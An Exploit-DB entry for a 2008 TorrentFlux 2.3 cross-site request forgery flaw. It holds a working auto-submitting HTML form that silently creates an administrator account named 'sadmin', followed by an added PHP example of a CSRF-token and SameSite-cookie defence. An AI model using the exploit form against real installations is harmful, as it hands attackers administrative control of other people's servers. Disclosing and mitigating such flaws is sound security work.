- 18 Dec 2022
- EDB-ID
- 31671
- EDB verification
- Passed
- Author
- MICHAEL BROOKS
- Vulnerability type
- WEBAPPS
- Platform
- PHP
- CVE
- cve-2008-6585
- Publication date
- 2008-04-18
HTML:
source: https://www.securityfocus.com/bid/28846/info
TorrentFlux is prone to a cross-site request-forgery vulnerability and a remote PHP code-execution vulnerability.
Exploiting these issues may allow a remote attacker to create administrative accounts in the application or to execute arbitrary PHP script code. This may facilitate the remote compromise of affected computers.
TorrentFlux 2.3 is vulnerable; other versions may also be affected.
<html>
Add an administrative account:
<form id="create_admin" method="post" action="http://localhost/torrentflux_2.3/html/admin.php?op=addUser">
  <input type=hidden name="newUser" value="sadmin">
  <input type=hidden name="pass1" value="password">
  <input type=hidden name="pass2" value="password">
  <input type=hidden name="userType" value=1>
  <input type=submit value="create admin">
</form>
</html>
<script>
  document.getElementById("create_admin").submit();
</script>
- Source
- www.exploit-db.com
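
The auto-submitting form above succeeds because the `op=addUser` action accepts any POST that arrives with the administrator's session cookie. The following PHP is an added example, not TorrentFlux code and not part of the original advisory: it shows a synchronizer-token check placed in front of such an action. The helper names `csrf_token()` and `csrf_request_is_valid()`, the `csrf_token` field name, and the cookie settings are assumptions; only `op=addUser`, `newUser`, `pass1` and `pass2` come from the page.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers for illustration (not TorrentFlux functions).

/** Return the per-session CSRF token, creating it on first use. */
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** True only for a POST whose body carries the token stored in the session. */
function csrf_request_is_valid(string $method, array $post, array $session): bool
{
    $expected  = $session['csrf_token'] ?? '';
    $submitted = $post['csrf_token'] ?? '';
    return $method === 'POST'
        && is_string($expected) && $expected !== ''
        && is_string($submitted)
        && hash_equals($expected, $submitted); // constant-time comparison
}

// Defense in depth: browsers do not attach a SameSite=Strict cookie to
// cross-site form posts (array form requires PHP 7.3 or later).
session_set_cookie_params(['httponly' => true, 'samesite' => 'Strict']);
session_start();

if (($_GET['op'] ?? '') === 'addUser') {
    if (!csrf_request_is_valid($_SERVER['REQUEST_METHOD'] ?? '', $_POST, $_SESSION)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // ... the existing account-creation logic runs only past this point ...
}
?>
<!-- The legitimate admin form embeds the token; a page on another origin cannot read it. -->
<form method="post" action="admin.php?op=addUser">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES) ?>">
  <input type="text" name="newUser">
  <input type="password" name="pass1">
  <input type="password" name="pass2">
  <button type="submit">Create user</button>
</form>
```

With this check in place, a POST built like the one in the advisory carries no `csrf_token` field and is answered with HTTP 403 before any account is created.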